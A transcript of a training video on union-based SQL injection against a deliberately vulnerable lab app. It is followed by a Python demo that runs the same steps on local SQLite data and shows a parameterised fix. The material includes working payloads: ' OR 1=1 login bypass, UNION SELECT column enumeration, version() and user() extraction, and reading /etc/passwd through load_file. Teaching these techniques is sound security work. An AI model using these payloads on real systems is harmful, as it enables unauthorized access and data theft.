00:00:00,570 --> 00:01:50,840
So now in this video we are going to talk about SQL injection, and we will see the UNION in action. First, we need to set up some settings in Metasploitable. Without this, you will get errors whenever you try to inject. What you need to do is open the PHP configuration file, php.ini, and what you want to change is the magic quotes setting: you need to change this value to Off. I have already changed it previously; magic_quotes_gpc is set to Off. You need to change it to Off and save the file. After that we need to restart the Apache web server. To do that you go to /etc/init.d, which is the directory of the init daemon scripts that run services like Apache, FTP, etc., and you run the apache2 script with reload. So you need to run apache2 reload to reload the Apache web server. Now I want to go to a web browser and type the IP address of this Metasploitable machine. Click on Mutillidae, and what you want to do is click Reset DB.
00:01:53,950 --> 00:03:45,330
So it will reset the database accordingly. Now I need to go to the login page, Login/Register, and log in as a user. It says please enter username and password; let's say Nicole and Nicole. It says bad username or password. Before going into this injection, I'll discuss one concept which we have already discussed in the previous video on SQL basics, but I want to explain it again for you. You start with SELECT * FROM the table WHERE username = something AND password = something. In the backend this query returns some values, that is, the row of the table which contains that username and password. That will be used by PHP or Python or any other backend programming language, and that can be used for authentication. So this query simply fetches the data from the table where username and password equal the constants that were supplied. Here there is some misconfiguration. What you can do is, instead of typing a username, you can type a quotation mark and then use OR. Or else you can put two hyphens and a space, and we know what this means: it will read the statement as, for example, username equals blank, and after this the query gets truncated, because in SQL this is a comment. So if you type two hyphens and a space, it will...
00:03:45,400 --> 00:05:32,290
...the other part of this query will not be considered in the query. So now what I can do is, before this comment, I can say OR, as we have already seen. I will say 1=1. What this means is I can simply place this value in the username field, and this whole thing will be sent into this username; the quotation mark would already be there, and what I want to send is only this part. If I send this, it will be placed in the username field and, on reading, it becomes WHERE username equals blank. And it will be treated as two conditions: this is one condition, OR 1=1, which is true because one is equal to one, right. And then, on seeing this comment, the right-hand part after the comment will be ignored because it's a comment. So you don't need to care about that, and what this returns is a true statement. So if you are not taking these values into a variable, if you are directly testing the authentication with the query, then it will automatically allow our target. So it does not check the username and password; that is bypassing authentication. So if the query returns that this statement is true, then automatically the login will be successful.
00:05:32,570 --> 00:07:15,110
So if you store it in variables and do not validate them, this will bypass the login authentication. I hope you have understood this syntax. It's very simple: in the username field you will put this value so that it gets into this username condition, and on checking this it will be divided into two conditions, which are username equals blank, OR 1=1, which is true. Even though the username is wrong, we don't care, because if one condition is true then the whole clause will be true. And this is the comment, which we don't care about. So the entire statement becomes true, and if you run the query, then you will get automatically logged in. So this is the basics of this injection. Now what I can do is put only a single quotation mark. So whenever I put the quotation mark and submit, I get some errors. Generally you should not get this, but this is a practice machine. We get errors; in case you see any website that gives only this error, this is a good indication. Even if you just get this message, it has some injection capabilities. As you can see, it has already told me: SELECT * FROM accounts WHERE username equals ... AND password equals .... OK, now let me explain this. On our backend there is a SELECT * FROM accounts.
00:07:15,110 --> 00:09:27,280
There is an accounts table. They're checking the username and the password. So I think it's a single quote: username equals single quote. So it's one condition, AND password equals another single quote; it's only two conditions. If the single quotation mark does not work, you can put the double quote. It's not a big deal. So this is a very basic vulnerability. OK, now what I will do is I will say: in the username field, a single quote, then OR 1=1, which is true. And I give a space and the two hyphens, and after this you need to put a space. You must not forget the space after the two hyphens for this to work. Now it will be like: username equals quotation quotation OR 1=1, comment, and the rest is commented out. And as you can see, there are so many details of the accounts that are there. So one thing you need to notice is, even though it is SELECT * FROM accounts, after getting the result this PHP server may filter some of these columns and display only a few columns. Here I have SELECT *; I have three columns: username, password and signature. These three are the columns and PHP shows you only these columns.
00:09:27,460 --> 00:11:21,870
But in reality, we do not know how many columns this accounts table will have. So we need to find the number of columns in this accounts table so that we can execute some queries. What you can do is say UNION. I did not explain this UNION statement in the previous video. What this means is UNION combines two results, but only when the columns of the two are equal. So if you do SELECT * FROM accounts UNION SELECT * FROM another table, those two results must have the same number of columns. So I say UNION SELECT. I don't know how many columns are there, so I simply say NULL, and then hyphen hyphen space. Let me copy this. What this means is: username equals quotation quotation, and then UNION SELECT NULL. When this condition fails, if the number of columns of this accounts table does not match our number of values, in this case we are sending NULL, I can see the error: the used SELECT statements have a different number of columns, because there is already one SELECT from a table which has, say, X number of columns, and here we are sending only one. So let me increase the number of columns: NULL, NULL.
00:11:23,510 --> 00:13:15,910
And there is no rule that you need to put NULL; you can put numbers also. According to the result, two columns are not sufficient. We need to put three columns, and more columns. So let me copy this; now I am testing three columns, and also let me test four columns. This is a somewhat tedious task, but if you understand the background, you get it easily. So even that fails. OK, now let's put five columns. Now it's successfully executed. Now let me review the accounts, and there you can see there are five columns in the accounts table. But we are getting only three regardless, because this backend PHP is filtering and showing only three columns. Now what you can also do is put numbers for easy understanding. We can say 1, 2, 3, 4, 5. If you click on this, we are getting one row where you can see username equals 2, password equals 3 and signature equals 4. It means this username is the second column of this accounts table, the password is the third column of the accounts table and the signature is the fourth column of the accounts table. And we do not see two columns: the first column and the fifth column. So the second, third and fourth columns are shown.
00:13:19,550 --> 00:15:21,500
Now one thing we can do is get the version number of this database. So there are five columns right now. What I can do is: 1, comma... If we want to display any information, you need to send the information in these positions 2, 3 and 4, because those values will be displayed in our output. That's it. This is the user function; I need to put it in small letters, let's say user(). This user() function indicates the current username the service is running as, and I also send version(). So now, as I said, we are asking for the user and the version of this MySQL database. As you can see, our user is root@localhost, and you can see the version of this MySQL database is 5.0.51. I want to Google for this, and as you can see, if I search for this version, I automatically get some vulnerabilities related to this version number, so I can just go and exploit one of these vulnerabilities. And with some luck I can find exploits for them. So we got the username, the user and the version number. What you can also do is load a file and display it into our output. There is a load_file() function.
00:15:24,880 --> 00:17:20,710
I'm going to the top directory; I don't know in which directory MySQL is, so I just go to /etc/passwd. I'm trying to view /etc/passwd, so there you go. We got the contents of this /etc/passwd, and you can see if there are any users with no password or just an anonymous login; then you can log into the system using that username. As you can see, the password is encrypted. All right, now I think we do not get any more information, but you can see the services that are running on the system, and you can just Google for anything regarding that. So I think that's all about this union-based SQL injection. I hope you have understood. Let's revise what we have done up to now. We are sending this, like a quotation mark and OR, which divides the one condition into two conditions, and we are making it true. Then we are getting the information from the web server, then we are finding the number of columns using this 1, 2, 3, 4, 5, 6, or we can keep NULL. Then, knowing the columns, we can learn which columns are displayed from this accounts table. And then we are asking for some information.
00:17:20,710 --> 00:19:21,310
We got this login page. Now let's reconsider our previous example: SELECT * FROM a sample table. Let's assume this is a sample table with username and password, where we have got the username and password. So to bypass this authentication, we should not use the comment, because it will also cut off the password part. Then, OK, we can also put the comment; let me try that one also. OK, first, generally this will be the username field, and what I put in this username is the quote, to make sure that this is one condition, and then I put OR because I want to put a true condition here so that this whole condition becomes true. And let's use strings now: '1'='1'. So I need to put another quotation mark, because there is already a quotation mark that belongs to this username. So now it will be like: username equals blank OR '1'='1', which becomes true. So I will rewrite this. So this is the username field. In the previous video we had both at the same time, but in this video we have two fields, username and password. So it's being checked two times.
00:19:21,470 --> 00:20:28,850
I can simply copy-paste this; whatever I put in the username, I can just copy-paste into the password field, and there you go. You can just simply paste this and try again. So let me take this. Now I'm giving the condition. Because we did the same in the password, you can see we have successfully logged in as admin, and the signature is Monkey. OK, so this is all about bypassing authentication using this OR-based SQL injection. I hope you have understood; just like in the previous scenario, what we have done is change it to a string so that we do not get any errors when we send the data. That's all we did. But it's done two times, for username and password; if it's successful for the username, it will be successful for the password.
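The whole procedure from the video (the single-quote error probe, the `' OR 1=1 -- ` bypass, the two-field `' OR '1'='1` bypass, the UNION SELECT NULL column count, the 1,2,3,4,5 markers, reading a database function through a displayed column) reproduced as an added example that is not part of the transcript or of Mutillidae's own code. It uses an in-memory SQLite table with constructed rows; the column names (cid, username, password, mysignature, is_admin) and the sample accounts are assumptions for the demo, and sqlite_version() stands in for MySQL's version()/user(), which SQLite does not have. The parameterised login_safe() is the fix the video never shows.

```python
import sqlite3

# Constructed sample data standing in for the 'accounts' table the video
# queries. Column names and rows are assumptions for this demo, not taken
# from the original page or from the application.
SAMPLE_ROWS = [
    (1, "admin", "adminpass", "Monkey!", 1),
    (2, "alice", "s3cret", "hello world", 0),
    (3, "bob", "hunter2", "signature text", 0),
]


def make_db():
    """In-memory SQLite database with a five-column accounts table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE accounts (cid INTEGER, username TEXT, password TEXT, "
        "mysignature TEXT, is_admin INTEGER)"
    )
    conn.executemany("INSERT INTO accounts VALUES (?, ?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


def login_vulnerable(conn, username, password):
    """The pattern the video describes: user input pasted into the SQL text.

    A quote in either field closes the string literal, so the rest of the
    input is parsed as SQL. A broken statement raises sqlite3.OperationalError,
    mirroring the error page the video gets for a lone quote.
    """
    sql = (
        "SELECT * FROM accounts WHERE username='" + username
        + "' AND password='" + password + "'"
    )
    return conn.execute(sql).fetchall()


def login_safe(conn, username, password):
    """Parameterised version: input is bound as data, never parsed as SQL."""
    sql = "SELECT * FROM accounts WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchall()


def quote_probe(conn):
    """Send a single quote; a database error coming back means injection."""
    try:
        login_vulnerable(conn, "'", "x")
        return None
    except sqlite3.OperationalError as exc:
        return str(exc)


def find_column_count(conn, max_cols=10):
    """UNION SELECT NULL,NULL,... until the column counts match.

    Each mismatch raises the 'different number of result columns' error;
    the first count that executes cleanly is the width of the table.
    """
    for n in range(1, max_cols + 1):
        nulls = ",".join(["NULL"] * n)
        try:
            login_vulnerable(conn, "' UNION SELECT " + nulls + " -- ", "x")
            return n
        except sqlite3.OperationalError:
            continue
    return None


def find_displayed_columns(conn, n):
    """UNION SELECT 1,2,...,n and return the marker row that comes back.

    The markers that land in the page's username/password/signature slots
    tell you which table columns reach the output (2, 3 and 4 in the video).
    """
    markers = ",".join(str(i) for i in range(1, n + 1))
    rows = login_vulnerable(conn, "' UNION SELECT " + markers + " -- ", "x")
    return rows[0]


def extract_db_version(conn, n, slot=1):
    """Put a database function in a displayed slot to read its value.

    MySQL would use version() and user(); SQLite's equivalent is
    sqlite_version(), used here so the demo runs offline.
    """
    cols = [str(i) for i in range(1, n + 1)]
    cols[slot] = "sqlite_version()"
    rows = login_vulnerable(conn, "' UNION SELECT " + ",".join(cols) + " -- ", "x")
    return rows[0][slot]


if __name__ == "__main__":
    db = make_db()
    print("quote probe error:", quote_probe(db))
    print("bypass with comment:", login_vulnerable(db, "' OR 1=1 -- ", "anything"))
    print("bypass in both fields:", login_vulnerable(db, "' OR '1'='1", "' OR '1'='1"))
    width = find_column_count(db)
    print("column count:", width)
    print("marker row:", find_displayed_columns(db, width))
    print("db version:", extract_db_version(db, width))
    print("safe login with payload:", login_safe(db, "' OR 1=1 -- ", "anything"))
```

Two caveats when carrying this over to the MySQL target in the video: MySQL only treats `--` as a comment when a space follows it (hence the stress on the trailing space; `#` also works), whereas SQLite accepts `--` either way, and PHP's magic_quotes_gpc, which the video turns off first, would have escaped the injected quote as `\'` and defeated every payload here.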